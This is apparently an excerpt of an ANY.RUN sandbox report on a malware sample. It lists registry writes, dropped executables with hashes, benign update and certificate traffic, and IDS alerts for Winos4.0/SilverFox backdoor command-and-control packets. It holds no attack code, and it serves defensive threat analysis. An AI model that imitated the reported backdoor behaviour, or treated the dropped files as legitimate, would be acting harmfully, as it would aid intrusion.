Operation:writeName:AppID
Value:
{20510F28-2A48-5A0C-B29F-D8150AF90AF8}
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{20510F28-2A48-5A0C-B29F-D8150AF90AF8}
Operation:writeName:LocalService
Value:
GoogleUpdaterInternalService140.0.7272.0
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{20510F28-2A48-5A0C-B29F-D8150AF90AF8}
Operation:writeName:ServiceParameters
Value:
--com-service
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{688BD533-FF4B-5424-ADB1-295B5C987389}\TypeLib
Operation:writeName:Version
Value:
1.0
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{688BD533-FF4B-5424-ADB1-295B5C987389}\TypeLib
Operation:writeName:Version
Value:
1.0
(PID) Process:(6504) updater.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{90A9770C-7287-5249-B78F-263562CAE1FD}\TypeLib
Operation:writeName:Version
Value:
1.0
Executable files
36
Suspicious files
483
Text files
309
Unknown types
1

Dropped files

PID
Process
Filename
Type
670486CB5F74AF900C505A558DD1C9018BC4.tmpC:\Users\Public\Documents\is-A6JN4.tmp
MD5:
SHA256:
670486CB5F74AF900C505A558DD1C9018BC4.tmpC:\Users\Public\Documents\man.dat
MD5:
SHA256:
472setup.exeC:\Users\admin\AppData\Local\Temp\Google472_484684920\UPDATER.PACKED.7Z
MD5:
SHA256:
5628men.exeC:\Users\Public\Documents\WindowsData\bypass.exeexecutable
MD5:B423CAF761DF91BA457D3FD6C747E4AA
SHA256:F330E21CF670DA67160937525DD5CA80B1F26C9B3DDDD34ADB2F175D85C485F1
670486CB5F74AF900C505A558DD1C9018BC4.tmpC:\Users\Public\Documents\is-0FQEL.tmpexecutable
MD5:3E80E94FC193E8B73D87ADF328ADD5E4
SHA256:96FD836BCD39DE9F57496000A72EEB1163A2A0817E3F814E4212D0ACC93C2736
5628men.exeC:\Users\Public\Documents\WindowsData\me.keycompressed
MD5:D6BF6CCC1882FF0CA93670B3EB0FB10A
SHA256:5EEEF5659BD2CB872D3D41064A2B295B5876EBE53073A95F46796C68913DB8D5
5628men.exeC:\Users\Public\Documents\WindowsData\X.vbebinary
MD5:04264646287BB028AD5280CF4DA39358
SHA256:73526196AC0F863BD46F1BD0653CE42C429064E24FAF2AD917FF935E9BBDFFB5
5628men.exeC:\Users\Public\Documents\WindowsData\NVIDIA.exeexecutable
MD5:2B45A9511BFE6FD4E61A6C7071FA0B60
SHA256:A411F96323035EDBBE3468D854B161F83CC5A0FA948CEFF524BF82B5FF1C0521
3108unzip.exeC:\Users\Public\Documents\men.exeexecutable
MD5:32D6EE4492A442C35C6E82CD36D6557C
SHA256:1F8A204DACD1F803CA12D9C10132E7D63E308037248BFD5D87BE6C69620142C8
5628men.exeC:\Users\Public\Documents\WindowsData\kail.exeexecutable
MD5:F3333DAB07B8D9D7A6B76B9DB8CEEE69
SHA256:72C33F24FB5853D2EF70ADECE5C7CACEDD8E568A9025F7A82FD5EF5C2F9967C5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
18
TCP/UDP connections
149
DNS requests
154
Threats
21

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3948
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6504
updater.exe
GET
200
142.250.181.227:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
6504
updater.exe
GET
200
142.250.181.227:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
6504
updater.exe
GET
200
142.250.185.163:80
http://o.pki.goog/we2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTuMJxAT2trYla0jia%2F5EUSmLrk3QQUdb7Ed66J9kQ3fc%2BxaB8dGuvcNFkCEQDPZmByDOs98xJONhjjIZaE
unknown
whitelisted
GET
34.104.35.123:80
http://edgedl.me.gvt1.com/edgedl/diffgen-puffin/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D/90ee204561905aa512c564e6fd0e8182cfb9a2574f5ebc579bb7a89870bb4441
unknown
whitelisted
1380
SIHClient.exe
GET
200
23.3.109.244:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
1268
svchost.exe
GET
200
23.3.109.244:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1380
SIHClient.exe
GET
200
23.3.109.244:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1268
svchost.exe
GET
200
2.16.168.124:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6876
chrome.exe
GET
200
216.58.206.78:80
http://clients2.google.com/time/1/current?cup2key=9:Rz7ytO3KsyqLxtMG9CbifabC1KOEPcYjMKOCTTzrvrI&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5944
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4944
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
3948
svchost.exe
40.126.31.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3948
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
6648
updater.exe
142.250.186.67:443
update.googleapis.com
GOOGLE
US
whitelisted
6504
updater.exe
142.250.185.110:443
dl.google.com
GOOGLE
US
whitelisted
6504
updater.exe
142.250.181.227:80
c.pki.goog
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 52.191.219.104
  • 4.231.128.59
whitelisted
google.com
  • 216.58.206.78
whitelisted
login.live.com
  • 40.126.31.3
  • 20.190.159.131
  • 20.190.159.64
  • 40.126.31.2
  • 40.126.31.0
  • 40.126.31.71
  • 40.126.31.128
  • 20.190.159.128
whitelisted
ocsp.digicert.com
  • 184.30.131.245
  • 2.17.190.73
whitelisted
update.googleapis.com
  • 142.250.186.67
whitelisted
dl.google.com
  • 142.250.185.110
whitelisted
c.pki.goog
  • 142.250.181.227
whitelisted
o.pki.goog
  • 142.250.185.163
whitelisted
edgedl.me.gvt1.com
  • 34.104.35.123
whitelisted
crl.microsoft.com
  • 2.16.168.124
  • 2.16.168.114
whitelisted

Threats

PID
Process
Class
Message
7044
NtHandleCallback.exe
Malware Command and Control Activity Detected
ET MALWARE Winos4.0 Framework CnC Login Message
7044
NtHandleCallback.exe
Malware Command and Control Activity Detected
BACKDOOR [ANY.RUN] SilverFox TCP Init Packet
7044
NtHandleCallback.exe
Malware Command and Control Activity Detected
ET MALWARE Winos4.0 Framework CnC Login Message CnC Server Response
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
7044
NtHandleCallback.exe
Malware Command and Control Activity Detected
BACKDOOR [ANY.RUN] SilverFox Encrypted Client Packet
888
tracerpt.exe
Malware Command and Control Activity Detected
BACKDOOR [ANY.RUN] SilverFox Keep-Alive Client Packet
888
tracerpt.exe
Malware Command and Control Activity Detected
BACKDOOR [ANY.RUN] SilverFox Keep-Alive Client Packet
6876
chrome.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
6876
chrome.exe
Not Suspicious Traffic
INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
888
tracerpt.exe
Malware Command and Control Activity Detected
BACKDOOR [ANY.RUN] SilverFox Keep-Alive Client Packet
Process
Message
men.exe
end
chrome.exe
I0000 00:00:1753491072.763831 8144 voice_transcription.cc:58] Registering VoiceTranscriptionCapability
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
86CB5F74AF900C505A558DD1C9018BC4.exe